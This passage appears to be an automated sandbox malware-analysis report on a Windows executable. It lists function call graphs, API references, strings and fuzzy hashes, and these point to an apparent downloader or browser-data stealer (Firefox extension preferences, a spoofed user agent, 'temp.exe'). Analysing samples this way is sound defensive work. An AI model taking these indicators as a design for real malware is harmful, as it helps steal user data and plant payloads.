• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_Heap$FreeH_prolog3Process
• String ID: user_pref("extensions.webextensions.uuids", "
• API String ID: 4110124055-3221024688
• Opcode ID: 02f8deaddc7aed7150535c45a7679d4da34ea1041be752d0be122329b87a69e7
• Instruction ID: f2018883e402b4b7a839993c108b872791b1d8fc7a5e16dd4fa452be3ea73bdc
• Opcode Fuzzy Hash: 02f8deaddc7aed7150535c45a7679d4da34ea1041be752d0be122329b87a69e7
• Instruction Fuzzy Hash: 01518E71D25309DBCF11DBA8C949BEEBBB4AF19300F608019E511B72C2D7746A59CBA2
APIs
• __EH_prolog3_GS.LIBCMT ref: 0020998D
  • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
  • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
  • Part of subcall function 0021ABF2: __EH_prolog3_GS.LIBCMT ref: 0021ABF9
  • Part of subcall function 0021ABF2: ctype.LIBCPMT ref: 0021ACB5
  • Part of subcall function 0020B7BF: __EH_prolog3.LIBCMT ref: 0020B7C6
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: H_prolog3_$H_prolog3H_prolog3_catch_ctype
• String ID: 17586936307509717578$@$ntdll.dll
• API String ID: 2848298560-3853183820
• Opcode ID: 2c55c164a3048108d55ae66f4a68f67d37ec0ec9fab2f5d76263df35c0595eef
• Instruction ID: d8a3a64554d0649f2e7438b8225ce3ac762d25a5ea5a20793c4029d79c9b7b98
• Opcode Fuzzy Hash: 2c55c164a3048108d55ae66f4a68f67d37ec0ec9fab2f5d76263df35c0595eef
• Instruction Fuzzy Hash: 182137B1D113589BCB10EFE8C946ACDBBF4AF08310F54412AE504BB282DB705A54CFA1
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002234E8,00000000,?,0025A8FC,?,?,?,0022368B,00000004,InitializeCriticalSectionEx,00248594,InitializeCriticalSectionEx), ref: 00223544
• GetLastError.KERNEL32(?,002234E8,00000000,?,0025A8FC,?,?,?,0022368B,00000004,InitializeCriticalSectionEx,00248594,InitializeCriticalSectionEx,00000000,?,002232D2), ref: 0022354E
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00223576
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: f9c1b6ae7f07e0f0d3ce7193361d6e0c4173d289ea825f84794450f558ae6c85
• Instruction ID: 1de4e275bb2bd8cfb7cd9d354800b53bce80d4ec24cd10c0507558a0ea127076
• Opcode Fuzzy Hash: f9c1b6ae7f07e0f0d3ce7193361d6e0c4173d289ea825f84794450f558ae6c85
• Instruction Fuzzy Hash: 8FE04F30A90319BBEF215FE1FD0EB983E55AB16F51F504430F90DE80E1EBA59A709985
APIs
• GetConsoleOutputCP.KERNEL32(07CD655B,00000000,00000000,?), ref: 0023039B
  • Part of subcall function 0023657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00235430,?,00000000,-00000008), ref: 002365DD
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002305ED
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00230633
• GetLastError.KERNEL32 ref: 002306D6
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: bb94a78d302e4d25880b2a376739ff1a3bd8ab7df5a2eecc79700367737a0d29
• Instruction ID: 95584e8af2b0e65120fd261481cc51c5386ed224498c8acc9047b15bad91bb18
• Opcode Fuzzy Hash: bb94a78d302e4d25880b2a376739ff1a3bd8ab7df5a2eecc79700367737a0d29
• Instruction Fuzzy Hash: 35D19AB5D102489FCF14CFA8D8D5AADBBB8FF49300F24412AE516EB351D630A962CF60
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: 6534820fa6556f6f3a25b692f8552bf494a720ad14578795e66a1f0413a74791
• Instruction ID: b3bd3ebbbe068a993ca5df094447a79f285491cad26f91db325e71cf6e4d1382
• Opcode Fuzzy Hash: 6534820fa6556f6f3a25b692f8552bf494a720ad14578795e66a1f0413a74791
• Instruction Fuzzy Hash: 3751F472921226FFEB299F94F441BBA73A8FF04310F148129E905572A1D732ED78DB50
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a67a077e91174a3484064c1fdb98f9f4c361c58070288016addf1fba428194c6
                                                                                                                                                                                            • Instruction ID: d2581172bda22e08134006d7e4c430a4d7be50592c50cfa458c2f9f52f6aa1ed
                                                                                                                                                                                            • Opcode Fuzzy Hash: a67a077e91174a3484064c1fdb98f9f4c361c58070288016addf1fba428194c6
                                                                                                                                                                                            • Instruction Fuzzy Hash: E641FBF2A20304FFD7189F78DC42B5EBBE8EB88710F10452AF411DB291D371AA648B80
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0023657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00235430,?,00000000,-00000008), ref: 002365DD
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0023558C
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00235593
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 002355CD
                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 002355D4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                            • Opcode ID: 3b48abbe099dbf6e61f342c1de1d7cd417183d79b9c2dd3db9c0bcf1761b08ea
                                                                                                                                                                                            • Instruction ID: 70d014d6af16b309a74913ea388d3b62873b9ab0e2d5c0d3e740364bd172cfc2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b48abbe099dbf6e61f342c1de1d7cd417183d79b9c2dd3db9c0bcf1761b08ea
                                                                                                                                                                                            • Instruction Fuzzy Hash: B221C5F1620A26BFDB20AF65D88596BB7AAFF14360B518528F81D97250D770FC208F90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00236627
                                                                                                                                                                                              • Part of subcall function 0023657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00235430,?,00000000,-00000008), ref: 002365DD
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023665F
                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023667F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                            • Opcode ID: 10820fcfda1e31ef2f46fea716fdde4eea5e77cf1ea320c283e3ed6e1a948a4f
                                                                                                                                                                                            • Instruction ID: 4bf06061fdb47ddbfb256633b6c745df1cae414528f82a4f11ca58c28e62131c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 10820fcfda1e31ef2f46fea716fdde4eea5e77cf1ea320c283e3ed6e1a948a4f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6611C4F5931616BEAA112BB6AC8ECAF696CEE463D4B104128FC0192101EA75CD604EB5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Func_class$H_prolog3
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3413606670-0
                                                                                                                                                                                            • Opcode ID: a7ec07360c5c5cad71c24db494fd1f22da418231d4eb2d5b5b7b709dca0a2ec6
                                                                                                                                                                                            • Instruction ID: 74003cf1057b5e183f2ac1d50efc358212d551ee9309e9f404e01fb2c545d451
                                                                                                                                                                                            • Opcode Fuzzy Hash: a7ec07360c5c5cad71c24db494fd1f22da418231d4eb2d5b5b7b709dca0a2ec6
                                                                                                                                                                                            • Instruction Fuzzy Hash: C2216D7091538CDFCF01DFA8C5946DCBBB4AF18300F6440A9E809A7282C7748A98CB95
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000), ref: 0023E44E
                                                                                                                                                                                            • GetLastError.KERNEL32(?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000,?,?,?,00230CCD,?), ref: 0023E45A
                                                                                                                                                                                              • Part of subcall function 0023E420: CloseHandle.KERNEL32(FFFFFFFE,0023E46A,?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000,?,?), ref: 0023E430
                                                                                                                                                                                            • ___initconout.LIBCMT ref: 0023E46A
                                                                                                                                                                                              • Part of subcall function 0023E3D6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023E405,0023B28E,?,?,0023072A,?,00000000,00000000,?), ref: 0023E3E9
                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0023B2A1,00000000,00000001,?,?,?,0023072A,?,00000000,00000000,?), ref: 0023E47F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                            • Opcode ID: fe28f9a170b47199e68a8f1742668d6348f05df77e84cbf3a7cf84a2f45f4532
                                                                                                                                                                                            • Instruction ID: 3d7ea87d428e955267f34fa812b081615b529daefd8bea7c7990c6f2c265f38c
                                                                                                                                                                                            • Opcode Fuzzy Hash: fe28f9a170b47199e68a8f1742668d6348f05df77e84cbf3a7cf84a2f45f4532
                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F0C03A510369BBCF222FD5EC0CA9A3F66FB4A7A1F054010FA1D95171DB328870DBA1
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00230338: GetConsoleOutputCP.KERNEL32(07CD655B,00000000,00000000,?), ref: 0023039B
                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,b:",00000000,?,00000000,?,?,00223A62,?,00000000,?,?,?,?), ref: 00230D70
                                                                                                                                                                                            • GetLastError.KERNEL32(?,00223A62,?,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00230D7A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                            • String ID: b:"
APIs
Strings
• iterator out of range, xrefs: 002112B0
• iterator does not fit current value, xrefs: 00211395
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: H_prolog3_
• String ID: iterator does not fit current value$iterator out of range
APIs
• EncodePointer.KERNEL32(00000000,?), ref: 00222B02
Strings
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
APIs
• __EH_prolog3_GS.LIBCMT ref: 002176D8
  • Part of subcall function 002061C0: __EH_prolog3_GS.LIBCMT ref: 002061C7
  • Part of subcall function 002061C0: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0020629D
  • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
  • Part of subcall function 0020E19F: __EH_prolog3.LIBCMT ref: 0020E1A6
Strings
• temp.exe, xrefs: 002177C7
• Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 002176E4
Similarity
• API ID: H_prolog3H_prolog3_$InternetOpen
• String ID: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603$temp.exe
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
Strings
• stoull argument out of range, xrefs: 0021C267
• invalid stoull argument, xrefs: 0021C25D
Similarity
• API ID: H_prolog3_catch_
• String ID: invalid stoull argument$stoull argument out of range
APIs
Strings
Similarity
• API ID: H_prolog3_
• String ID: H$value
APIs
Strings
Similarity
• API ID: H_prolog3_
• String ID: H$value
APIs
• __EH_prolog3.LIBCMT ref: 00205FC0
  • Part of subcall function 00205D26: __EH_prolog3_GS.LIBCMT ref: 00205D2D
Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3H_prolog3_
                                                                                                                                                                                            • String ID: at line $, column
                                                                                                                                                                                            • API String ID: 3355343447-191570568
                                                                                                                                                                                            • Opcode ID: bd810248da179a6972a6c52b49fe50656bd878aeac5fd9c578559a53332054dd
                                                                                                                                                                                            • Instruction ID: 20e7e0616913cc15300b05aabb1fd0d28234aacaa31cdf5bef247252e074345b
                                                                                                                                                                                            • Opcode Fuzzy Hash: bd810248da179a6972a6c52b49fe50656bd878aeac5fd9c578559a53332054dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C219D70E103059FDB48EF68D9567AEBBB1AF84300F54456AE115E73C2DBB45A10CF92
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002135B6
                                                                                                                                                                                              • Part of subcall function 00205EB3: __EH_prolog3.LIBCMT ref: 00205EBA
                                                                                                                                                                                              • Part of subcall function 0020E283: __EH_prolog3.LIBCMT ref: 0020E28A
                                                                                                                                                                                              • Part of subcall function 00205E6C: __EH_prolog3.LIBCMT ref: 00205E73
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3$H_prolog3_
                                                                                                                                                                                            • String ID: J $type_error
                                                                                                                                                                                            • API String ID: 4240126716-1852224253
                                                                                                                                                                                            • Opcode ID: 79f8b71534bfeda7b4377c7f158db850be5ef228c8239575b3e6fa2d488da768
                                                                                                                                                                                            • Instruction ID: 3887ef6187be6854a73a92f6ee541f500d75cd9394c1e09d488aeb8461ef26bd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 79f8b71534bfeda7b4377c7f158db850be5ef228c8239575b3e6fa2d488da768
                                                                                                                                                                                            • Instruction Fuzzy Hash: 00218970C24348EADB04EBE8D895ADDBBB0BF15300F90815DE5446B2C2DBB41A58CB52
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_
                                                                                                                                                                                            • String ID: /?#$://
                                                                                                                                                                                            • API String ID: 2427045233-1756703676
                                                                                                                                                                                            • Opcode ID: 6b809667ebc0690d7e1bc766a8afb3540ba3e58ab98ab58ed28939c5ad2c45d1
                                                                                                                                                                                            • Instruction ID: 412e8a15658a45b40e6c517228019a8139df78e4ebbaed47cdc33baa111895db
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b809667ebc0690d7e1bc766a8afb3540ba3e58ab98ab58ed28939c5ad2c45d1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B1157715303648ECF2D9F245C997FA7A649B41324F6002ADE562571C3CBB149B48EA0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00217B4D
                                                                                                                                                                                              • Part of subcall function 0020A6BD: __EH_prolog3.LIBCMT ref: 0020A6C4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                                            • String ID: 3e3$4e4
                                                                                                                                                                                            • API String ID: 431132790-2404590204
                                                                                                                                                                                            • Opcode ID: 13b0bd5d956bbed603a0582478526431f5d2c05730a7722bbe151abb34ab832c
                                                                                                                                                                                            • Instruction ID: 6823ce884f0b489b7477ab11d78ed7b3e69fa6f0fab16fa612132a210d88b88e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 13b0bd5d956bbed603a0582478526431f5d2c05730a7722bbe151abb34ab832c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D11E571A20709AFDB58EFBCC84569EB6F4AB44324F104B3EE026D32D2CB748E148B51
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                                            • String ID: : 0x$invalid UTF-8 byte at index
                                                                                                                                                                                            • API String ID: 431132790-1231261809
                                                                                                                                                                                            • Opcode ID: 647ba802f4b7e98095dfc73d69b2b8073608e1bab5bb667fb4fb00bda1522832
                                                                                                                                                                                            • Instruction ID: a235d7c81e1c175280541d8a94aecd73b665fc4d7736032bcd53f8fd6d165a98
                                                                                                                                                                                            • Opcode Fuzzy Hash: 647ba802f4b7e98095dfc73d69b2b8073608e1bab5bb667fb4fb00bda1522832
